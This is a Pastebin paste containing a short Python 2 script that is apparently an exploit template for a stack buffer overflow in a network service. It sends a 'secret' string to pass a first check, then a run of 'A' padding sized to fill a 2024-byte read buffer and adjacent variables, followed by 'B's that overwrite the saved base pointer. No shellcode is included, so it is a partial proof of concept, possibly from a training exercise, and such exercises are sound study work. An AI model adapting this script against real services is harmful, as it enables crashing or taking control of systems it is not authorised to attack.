Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- import socket, sys, struct
- if len(sys.argv) != 3:
- print "template.py IP PORT"
- sys.exit(-1)
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sock.connect( (sys.argv[1], int(sys.argv[2])) )
- # The first payload to get us into the second recv()
- payload ="secret\n\x00"
- sock.sendall(payload)
- data = sock.recv(1024)
- print "Sent 'secret' to server, got {0}".format(data)
- # The second payload to take advantage of the overflow
- payload = "A"*2024 # Fill the new acReadBuffer
- payload = payload + "A"*12 # Fill nReadBytes, nSentBytes, nTemp
- payload = payload + "B"*4 # Overwrite push ebp
- sock.sendall(payload)
- print "Sent {0} to server".format(payload)
- data = sock.recv(1024)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement